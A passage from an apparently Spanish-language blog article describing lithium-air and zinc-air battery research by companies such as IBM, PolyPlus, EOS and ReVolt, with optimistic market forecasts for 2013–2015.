Tanto IBM como PolyPlus, entre otros, están investigando las baterías de Litio-aire dónde utilizan el oxígeno atmosférico para modificar la estructura tradicional del cátodo. Esto resulta en baterías con una capacidad específica 10 veces superior a las actuales (lo que vendría siendo similar a la densidad energética de la gasolina en un auto), considerablemente más baratas y adicionalmente con un peso muy reducido. Apuntando principalmente al sector automotriz, prometen una autonomía sobre los 800 Km con una configuración similar a los autos eléctricos actuales. Sin embargo todavía queda el desafío de aumentar la vida útil de la batería y resolver los problemas de los contaminantes y humedad presentes en el oxigeno atmosférico, para lo cual ya existen varias soluciones teóricas con las cuales están experimentando.



Zinc-Aire

Similar a las baterías de Litio-aire, las baterías de Zinc-aire recargables han sido largamente sólo una promesa. Pero finalmente empresas como EOS Energy Storage en EEUU y ReVolt en Suiza prometen haber superado, al menos en el laboratorio, sus principales deficiencias incluyendo recargarlas de forma eficiente. La promesa son baterías mucho más baratas, seguras y con una vida útil superior a los 10.000 ciclos de carga (al menos en el caso de EOS). Su intención es resolver problemas de almacenamiento de energía en el sistema de suministro eléctrico, permitiendo capturar la energía intermitente que se obtiene de turbinas eólicas y paneles solares, eliminando el principal problema que declaran los detractores de estas energías renovables. Aunque ReVolt promete haber descubierto la forma de utilizar estas baterías también en automóviles y dispositivos electrónicos.

Sin importar cual de estas cuatro tecnologías salga finalmente del laboratorio a un uso real, los avances se ven promisorios. Los expertos concuerdan que el último desafío por superar es la manufactura a escala masiva de estas tecnologías. Al menos gobiernos e inversionistas privados están aportando grandes montos a que finalmente demos un gran salto en la evolución de las baterías. Lo mejor de todo es que varias de estas empresas proyectan tener estas soluciones en el mercado en un plazo que varía entre 2013 y 2015. A cruzar los dedos.

Fuente